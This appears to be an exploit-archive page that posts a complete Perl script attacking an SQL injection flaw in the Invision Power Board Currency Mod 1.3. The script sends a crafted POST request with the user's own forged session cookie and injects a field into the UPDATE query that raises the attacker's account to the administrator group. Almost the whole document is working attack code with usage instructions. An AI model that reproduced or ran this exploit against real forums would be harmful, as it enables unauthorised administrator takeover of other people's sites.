Home / os / winme

ipbcurrency-sql.txt

Posted on 12 March 2010



# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com<http://www.invisionpower.com>
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
#    Invision Power Board Currency Mod(edit) SQL injection.             #
#    Bug found by Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>                      #
#    The exploit is updating your user to an admin account              #
#        **YOU SHOULD HAVE CURRENCY EDIT ACCESS!**                      #
#########################################################################
use IO::Socket;
use Digest::MD5 qw(md5_hex);

$host    = $ARGV[0];
$path    = $ARGV[1];
$id        = $ARGV[2];
$passwd    = $ARGV[3];

if(!$ARGV[3])
{
print "#################################################
";
print "##   IPB Currency Mod SQL injection Exploit.   ##
";
print "##          Discoverd By Pr0T3cT10n.           ##
";
print "#################################################
";
print "$0 [host] [path] [your id] [your passowrd]
";
print "$0 host.com /forum 567 123456
";
print "#################################################
";
exit();
}
print "[~] Connecting $host:80...
";
$socket = IO::Socket::INET->new(
Proto => "tcp" ,
PeerAddr => $host ,
PeerPort => "80") or die("[-] Connection faild.
");
print "[+] Connected.
[~] Sending POST information...
";
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1
";
$pack.= "Host: " . $host . "
";
$pack.= "User-Agent: No_Agent
";
$pack.= "Accept: */*
";
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "
";
$pack.= "Keep-Alive: 300
";
$pack.= "Connection: keep-alive
";
$pack.= "Content-Type: application/x-www-form-urlencoded
";
$pack.= "Content-Length: 24

";
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'

print $socket $pack;

while($res = <$socket>)
{
if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)
{
print("[+] succeed.
");
exit();
}
}
print("[-] Faild.
");
exit();

 

TOP

Malware :

Exploits :